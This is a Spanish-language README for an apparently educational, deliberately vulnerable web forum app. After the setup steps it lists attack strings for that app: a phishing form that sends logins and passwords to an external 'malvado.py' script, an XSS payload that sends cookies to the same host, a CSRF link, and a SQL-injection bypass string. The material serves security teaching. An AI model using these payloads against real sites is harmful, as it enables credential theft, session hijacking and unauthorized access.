# Ejemplo de vulnerabilidades en aplicaciones web

Para hacer funcionar el ejemplo se deben seguir los siguientes pasos:

1. Instalar las dependencias:

        npm install

2. Crear la base de datos de SQLite. Desde la terminal:

        sqlite3 foro.db < foro.sql

3. Correr el servidor:

        npm start

4. En el browser, ir a `http://nombre-servidor/`

A continuación están las cadenas de caracteres que se pueden usar para explotar
las vulnerabilidades de la aplicación:

## Inyección HTML

    Para ver más comentarios, favor de teclear los siguientes datos:
    <form action="http://webcem01.cem.itesm.mx:8005/cgi-bin/malvado.py">
      <p>
        Login: <input type="text" name="login">
      </p>
      <p>
        Password: <input type="password" name="password">
      </p>
      <p>
        <input type="submit" value="Continuar">
      </p>
    </form>

## Cross-site scripting (XSS)

    <script language="javascript">
      function f() {
        document.location="http://webcem01.cem.itesm.mx:8005/cgi-bin/malvado.py?" +
          document.cookie
      }
    </script>
    Encontré un sitio muy interesante <a href="javascript:f()">aquí</a>, espero les guste.

## Cross-site request forgery (CSRF)

    <p>Presiona "like" si te gusta el chocolate.</p>
    <a href="/?texto=Soy+un+reverendo+idiota.">
      <img src="https://addons.cdn.mozilla.net/user-media/addon_icons/303/303900-64.png"
        width="64" height="64"/>
    </a>

## Inyección SQL

    ' or ''='
